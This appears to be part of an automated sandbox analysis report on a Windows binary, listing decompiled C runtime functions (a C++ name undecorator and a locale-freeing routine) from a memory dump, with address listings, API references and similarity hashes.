Instruction Fuzzy Hash: 95E08C32A11228EBCB14CBC9C904A8AB3FCFB48A40B1545AAF501E3240D2B4DE80DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0748, Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1A0748(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				void* _t177;
				signed int _t181;
				void* _t182;
				signed int _t185;
				void* _t187;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x6e21304c; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E6E19D85E(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x6e21304c = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x6e213054; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E6E19DB2A( &_v12, E6E19EE83(_t253, __eflags));
								} else {
									_t162 = E6E19D833(_t198,  &_v44, 0x20, E6E19EE83(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E6E19D8A2(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x6e213054; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E6E19F522();
								_t200 =  &_v12;
								E6E19DB2A( &_v12, _t115);
							} else {
								_t152 = E6E19D8A2(E6E19F522(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E6E19D833(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E6E19D8C4(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E6E1A0BB7(0x6e213068, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E6E1A19E4(0,  &_v36, _t261);
							E6E19D99C( &_v12, E6E19D8C4(E6E19D833(0x6e213068,  &_v44, 0x28, E6E19EB2B( &_v52)),  &_v28, 0x29));
							_t205 =  *0x6e213054; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E6E19D99C( &_v12,  &_v20);
								_t205 =  *0x6e213054; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E6E1A18BB(_t253);
								_t209 =  &_v12;
								E6E19DB2A( &_v12, _t129);
							} else {
								_t142 = E6E1A18BB(_t253);
								_t209 =  &_v12;
								E6E19D99C( &_v12, _t142);
							}
							E6E19D99C( &_v12, E6E1A0C41(_t209,  &_v52));
							_t134 =  *0x6e213054; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E6E19DB2A( &_v12, E6E1A294B());
							} else {
								E6E19D99C( &_v12, E6E1A294B());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x6e21304c = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E6E19D8A2(E6E19D50F( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x6e21304c = _t165 + 1;
							_t169 =  *0x6e213054; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E6E1A291C();
								_t198 =  &_v20;
								E6E19DB2A( &_v20, _t172);
							} else {
								_t174 = E6E1A291C();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t177 = E6E19D46F( &_v44,  &_v28);
						_t15 =  &_v28; // 0x6e205230
						_t244 = _t177;
						E6E19D8A2(_t177, _t15,  &_v12);
						_t16 =  &_v28; // 0x6e205230
						_v12 =  *_t16;
						_v8 = _v24;
						_t181 =  *0x6e21304c; // 0x0
						if( *_t181 == 0) {
							_t182 = E6E19D50F( &_v52, 1);
							_t28 =  &_v28; // 0x6e205230
							E6E19D8A2(_t182, _t28,  &_v12);
							_t29 =  &_v28; // 0x6e205230
							_v12 =  *_t29;
							_t185 = _v24;
						} else {
							_t187 = E6E1A1A13(_t253,  &_v44);
							_t21 =  &_v28; // 0x6e205230
							_t189 = E6E19D833(_t244, _t21, 0x20, _t187);
							_t263 = _t263 + 0x10;
							_t190 = E6E19D8A2(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x6e21304c; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x6e21304c = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

0x6e1a074b
0x6e1a0751
0x6e1a0754
0x6e1a075b
0x6e1a0ae9
0x6e1a0af1
0x6e1a0af9
0x6e1a0af9
0x6e1a0afc
0x6e1a0b00
0x6e1a0b00
0x6e1a0763
0x6e1a076b
0x00000000
0x00000000
0x00000000
0x6e1a0771
0x6e1a0771
0x6e1a0774
0x6e1a0777
0x6e1a0778
0x6e1a0781
0x6e1a07ad
0x6e1a07af
0x6e1a0ad9
0x6e1a0ad9
0x6e1a0adc
0x6e1a0ae0
0x6e1a0ae3
0x00000000
0x6e1a0ae3
0x6e1a07b5
0x6e1a07b7
0x6e1a07ba
0x00000000
0x00000000
0x6e1a07c0
0x6e1a07c3
0x00000000
0x00000000
0x6e1a07c9
0x6e1a07ce
0x6e1a07d2
0x6e1a07da
0x6e1a07e0
0x6e1a07e3
0x6e1a07e4
0x6e1a07e6
0x6e1a08cf
0x6e1a08d2
0x6e1a08d4
0x6e1a08db
0x6e1a08dd
0x6e1a08e2
0x6e1a08e3
0x6e1a094d
0x6e1a08e5
0x6e1a08f1
0x6e1a08f6
0x6e1a0903
0x6e1a090d
0x6e1a0910
0x6e1a0910
0x6e1a08e3
0x6e1a0952
0x6e1a0960
0x6e1a0961
0x6e1a0985
0x6e1a098c
0x6e1a098f
0x6e1a0963
0x6e1a0973
0x6e1a0978
0x6e1a097d
0x6e1a0980
0x6e1a0980
0x6e1a0998
0x6e1a09a4
0x6e1a09a9
0x6e1a09b4
0x6e1a09be
0x6e1a09c1
0x6e1a09c1
0x6e1a09d0
0x6e1a09d4
0x6e1a09dd
0x6e1a09d6
0x6e1a09d6
0x6e1a09d8
0x6e1a09d8
0x6e1a09e4
0x6e1a0a12
0x6e1a0a17
0x6e1a0a24
0x6e1a0a31
0x6e1a0a36
0x6e1a0a36
0x6e1a0a44
0x6e1a0a48
0x6e1a0a5b
0x6e1a0a62
0x6e1a0a65
0x6e1a0a4a
0x6e1a0a4a
0x6e1a0a51
0x6e1a0a54
0x6e1a0a54
0x6e1a0a78
0x6e1a0a7d
0x6e1a0a8c
0x6e1a0a8d
0x6e1a0aaa
0x6e1a0a8f
0x6e1a0a99
0x6e1a0a99
0x6e1a0aaf
0x6e1a0ab4
0x6e1a0ace
0x6e1a0ad1
0x6e1a0ad5
0x6e1a0ab6
0x6e1a0ab9
0x6e1a0abe
0x6e1a0ac4
0x6e1a0ac9
0x6e1a0ac9
0x00000000
0x6e1a0ab4
0x6e1a07ef
0x6e1a088d
0x6e1a088d
0x6e1a0890
0x6e1a0895
0x6e1a0895
0x6e1a0899
0x6e1a0939
0x00000000
0x6e1a0939
0x6e1a08a2
0x00000000
0x00000000
0x6e1a08a9
0x6e1a08ae
0x6e1a08bb
0x6e1a08bc
0x6e1a0915
0x6e1a091c
0x6e1a091f
0x6e1a08be
0x6e1a08be
0x6e1a08c4
0x6e1a08c9
0x6e1a08cc
0x6e1a08cc
0x00000000
0x6e1a08bc
0x6e1a07f5
0x6e1a07fe
0x6e1a0806
0x6e1a080f
0x6e1a0813
0x6e1a0815
0x6e1a081a
0x6e1a081d
0x6e1a0823
0x6e1a0826
0x6e1a082e
0x6e1a0866
0x6e1a086f
0x6e1a0875
0x6e1a087a
0x6e1a087d
0x6e1a0880
0x6e1a0830
0x6e1a0834
0x6e1a083a
0x6e1a0840
0x6e1a0845
0x6e1a0852
0x6e1a0859
0x6e1a085c
0x6e1a085c
0x6e1a0883
0x6e1a0886
0x00000000
0x6e1a0886
0x6e1a0783
0x6e1a0787
0x00000000
0x6e1a078d
0x6e1a0790
0x6e1a0790
0x6e1a0793
0x6e1a0796
0x6e1a0798
0x6e1a07a1
0x6e1a07a8
0x6e1a07a8
0x00000000
0x6e1a07a1
0x6e1a0787

APIs

DName::operator+.LIBCMT ref: 6E1A0815
DName::operator+.LIBCMT ref: 6E1A0852
DName::DName.LIBVCRUNTIME ref: 6E1A0866
DName::operator+.LIBCMT ref: 6E1A0875
DName::operator+.LIBCMT ref: 6E1A0903
DName::operator|=.LIBCMT ref: 6E1A091F
DName::DName.LIBVCRUNTIME ref: 6E1A092B
DName::operator+.LIBCMT ref: 6E1A0939
DName::operator+.LIBCMT ref: 6E1A0973
DName::operator+.LIBCMT ref: 6E1A09B4
UnDecorator::getReturnType.LIBCMT ref: 6E1A09E4
operator+.LIBVCRUNTIME ref: 6E1A0AF1

Strings

0R n, xrefs: 6E1A080F, 6E1A0812
h0!n, xrefs: 6E1A09C6

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID: 0R n$h0!n
API String ID: 1186856153-3931479413
Opcode ID: 264eacc22e4a46c5ee126ee24573a3d31bcb67dbac7cc310c81f53ec7da2741b
Instruction ID: 6d875075bc2993bdeeed8eee4bb8c3d4eaafa9c82b7871a5c5f3e741c3f5ffeb
Opcode Fuzzy Hash: 264eacc22e4a46c5ee126ee24573a3d31bcb67dbac7cc310c81f53ec7da2741b
Instruction Fuzzy Hash: A1C19F75900209AFDB04CFE8C895AFDBBF9BF19304F10445DE206A7291EB749AC4EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1A13, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E1A1A13(void* __edx, signed int* _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				intOrPtr* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				void* _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x6e21304c; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x6e213058 == 0 ||  *0x6e213059 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E6E19D46F( &_v108,  &_v44);
							E6E19D8A2(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E6E19D833(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x6e21304c; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E6E1A315F(_t164, _t203, _t204, _t206,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E6E19D8A2(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x6e21304c = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x6e21304c = _t71;
							_t101 = E6E1A315F(_t164, _t203, _t204, _t206,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E6E19D3EF( &_v76, 0x6e21304c, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E6E19D8A2(E6E19D46F( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x6e213044; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E6E19DAEC(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if(__eflags != 0) {
								L31:
								_push( &_v204);
								_t122 = E6E19D833(_t177,  &_v212, 0x60, E6E19FD9A(_t164, _t177, _t203, _t204, __eflags));
								_t207 = _t207 + 0x10;
								_t101 = E6E19D8C4(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x6e21304c = _t52;
							_t125 = E6E1A0CF6(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E6E19D8A2(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x6e21304c; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x6e21304c =  *0x6e21304c + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x6e21304c = _t46;
							_t135 = E6E1A315F(_t164, _t203, _t204, _t206,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E6E19D8A2(E6E19D8C4(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x6e21304c = _t18;
							while(1) {
								E6E1A315F(_t164, _t203, 0, _t206,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = 0;
									if(0 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E6E19D944( &_v28,  &_v60);
										_t153 = E6E19D8A2( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 =  *(_t153 + 4);
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x6e21304c; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E6E19D833(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E6E19D8C4(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E6E1A0B86(_t177, _t203, _t204, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x6e21304c; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E6E19D8A2(E6E19D880(E6E19D50F( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E6E19D795(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

0x6e1a1a13
0x6e1a1a1e
0x6e1a1a22
0x6e1a1a25
0x6e1a1a29
0x6e1a1a2b
0x6e1a1a2b
0x6e1a1a30
0x6e1a1a34
0x00000000
0x00000000
0x6e1a1a49
0x6e1a1a5b
0x6e1a1a60
0x6e1a1a6b
0x6e1a1a7c
0x6e1a1a7e
0x6e1a1a86
0x6e1a1a8b
0x6e1a1a90
0x6e1a1a9e
0x6e1a1aa0
0x6e1a1aa3
0x6e1a1aa7
0x6e1a1aac
0x6e1a1aac
0x6e1a1a90
0x6e1a1aaf
0x6e1a1ab7
0x6e1a1d2d
0x6e1a1d32
0x6e1a1d35
0x6e1a1d35
0x6e1a1d38
0x6e1a1d3c
0x6e1a1d41
0x6e1a1d41
0x6e1a1d45
0x6e1a1d4a
0x6e1a1d4d
0x6e1a1d51
0x00000000
0x00000000
0x00000000
0x6e1a1d51
0x6e1a1abd
0x6e1a1abd
0x6e1a1ac0
0x6e1a1ac9
0x6e1a1acc
0x6e1a1d08
0x6e1a1d0d
0x6e1a1d1b
0x6e1a1d20
0x00000000
0x6e1a1d20
0x6e1a1ad2
0x6e1a1ad5
0x6e1a1caf
0x6e1a1cb9
0x6e1a1cc1
0x6e1a1ccf
0x6e1a1ce2
0x6e1a1cea
0x6e1a1cef
0x6e1a1cf2
0x6e1a1cf8
0x6e1a1cfb
0x6e1a1d01
0x6e1a1d01
0x00000000
0x6e1a1cfb
0x6e1a1adb
0x6e1a1ade
0x6e1a1c1b
0x6e1a1c1f
0x6e1a1c76
0x6e1a1c7c
0x6e1a1c8c
0x6e1a1c91
0x6e1a1c9f
0x6e1a1ca4
0x00000000
0x6e1a1ca4
0x6e1a1c21
0x6e1a1c25
0x00000000
0x00000000
0x6e1a1c27
0x6e1a1c2c
0x6e1a1c3a
0x6e1a1c3f
0x6e1a1c51
0x6e1a1c55
0x6e1a1c5a
0x6e1a1c5d
0x6e1a1c62
0x6e1a1c65
0x00000000
0x00000000
0x6e1a1c6b
0x6e1a1c6b
0x00000000
0x6e1a1c6b
0x6e1a1ae5
0x6e1a1ae8
0x00000000
0x00000000
0x6e1a1aee
0x6e1a1af1
0x6e1a1bda
0x6e1a1bdf
0x6e1a1bed
0x6e1a1bf2
0x6e1a1c0f
0x6e1a1c14
0x00000000
0x6e1a1c14
0x6e1a1af7
0x6e1a1afa
0x6e1a1b10
0x6e1a1b13
0x6e1a1b13
0x6e1a1b13
0x6e1a1b16
0x6e1a1b19
0x6e1a1b1e
0x6e1a1b26
0x6e1a1b2b
0x6e1a1b2e
0x6e1a1b31
0x6e1a1b33
0x6e1a1b7d
0x6e1a1b7e
0x6e1a1b7e
0x6e1a1b35
0x6e1a1b35
0x6e1a1b37
0x6e1a1b76
0x6e1a1b39
0x6e1a1b3c
0x6e1a1b42
0x6e1a1b49
0x6e1a1b50
0x6e1a1b57
0x6e1a1b6a
0x6e1a1b6f
0x6e1a1b71
0x6e1a1b71
0x6e1a1b37
0x6e1a1b80
0x6e1a1b83
0x6e1a1b86
0x6e1a1b88
0x00000000
0x00000000
0x6e1a1b8a
0x6e1a1b8f
0x6e1a1b92
0x00000000
0x00000000
0x6e1a1ba1
0x6e1a1ba6
0x6e1a1bb9
0x6e1a1bbd
0x6e1a1bc2
0x00000000
0x6e1a1bc2
0x6e1a1bca
0x6e1a1bce
0x6e1a1bd1
0x00000000
0x6e1a1afc
0x6e1a1b00
0x6e1a1b06
0x00000000
0x6e1a1b06
0x6e1a1dbf
0x6e1a1dbf
0x6e1a1dc4
0x6e1a1dc4
0x6e1a1a49
0x6e1a1d57
0x6e1a1d5c
0x6e1a1d60
0x6e1a1d73
0x6e1a1d76
0x6e1a1d78
0x6e1a1d86
0x6e1a1d8d
0x6e1a1daf
0x6e1a1db6
0x6e1a1dbb
0x6e1a1d7a
0x6e1a1d7c
0x6e1a1d7c
0x6e1a1d62
0x6e1a1d64
0x6e1a1d66
0x6e1a1d6a
0x6e1a1d6d
0x6e1a1d6d
0x6e1a1d64
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E1A1A7E
DName::operator+.LIBCMT ref: 6E1A1BB4

Part of subcall function 6E19D944: shared_ptr.LIBCMT ref: 6E19D960

DName::operator+.LIBCMT ref: 6E1A1C00
DName::operator+.LIBCMT ref: 6E1A1C0F
DName::operator+.LIBCMT ref: 6E1A1B6A

Part of subcall function 6E1A315F: DName::operator=.LIBVCRUNTIME ref: 6E1A31EE

DName::operator+.LIBCMT ref: 6E1A1D3C
DName::operator=.LIBVCRUNTIME ref: 6E1A1D7C
DName::DName.LIBVCRUNTIME ref: 6E1A1D94
DName::operator+.LIBCMT ref: 6E1A1DA3
DName::operator+.LIBCMT ref: 6E1A1DAF

Part of subcall function 6E1A315F: Replicator::operator[].LIBVCRUNTIME ref: 6E1A319C

Strings

0R n, xrefs: 6E1A1A60
0R n, xrefs: 6E1A1D86
0R n, xrefs: 6E1A1B49

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID: 0R n$0R n$0R n
API String ID: 1026175760-523500220
Opcode ID: d7bccd66f78af15c3d8707744a540bc881cb4007278a14ef2cb64c52650abb24
Instruction ID: 9b6d61be6e9913944e0f1ff03e7f1562de3123b21b8d13cf51c18023643e0da5
Opcode Fuzzy Hash: d7bccd66f78af15c3d8707744a540bc881cb4007278a14ef2cb64c52650abb24
Instruction Fuzzy Hash: 85C190B5A00204DFDB14CFE8C858BEEB7F9BB15304F14445DE289A7281EB759A88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BC7CF, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1BC7CF(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e212750) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E1B110D(_t46);
							E6E1C0755( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E1B110D(_t47);
							E6E1C0C42( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E1B110D( *((intOrPtr*)(_t74 + 0x7c)));
						E6E1B110D( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E1B110D( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E1B110D( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E1B110D( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E1B110D( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E1BC940( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e212218) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E1B110D(_t31);
							E6E1B110D( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E1B110D(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E1B110D(_t74);
			}

0x6e1bc7d7
0x6e1bc7db
0x6e1bc7e3
0x6e1bc7ec
0x6e1bc7f1
0x6e1bc7f8
0x6e1bc800
0x6e1bc808
0x6e1bc813
0x6e1bc819
0x6e1bc81a
0x6e1bc822
0x6e1bc82a
0x6e1bc835
0x6e1bc83b
0x6e1bc83f
0x6e1bc84a
0x6e1bc850
0x6e1bc7f1
0x6e1bc851
0x6e1bc859
0x6e1bc86c
0x6e1bc87f
0x6e1bc88d
0x6e1bc898
0x6e1bc89d
0x6e1bc8a6
0x6e1bc8ae
0x6e1bc8af
0x6e1bc8b5
0x6e1bc8b8
0x6e1bc8bb
0x6e1bc8c2
0x6e1bc8c4
0x6e1bc8c8
0x6e1bc8d0
0x6e1bc8d7
0x6e1bc8dd
0x6e1bc8de
0x6e1bc8de
0x6e1bc8e5
0x6e1bc8e7
0x6e1bc8ec
0x6e1bc8f4
0x6e1bc8f9
0x6e1bc8fa
0x6e1bc8fa
0x6e1bc8fd
0x6e1bc900
0x6e1bc903
0x6e1bc906
0x6e1bc906
0x6e1bc916

APIs

___free_lconv_mon.LIBCMT ref: 6E1BC813

Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0772
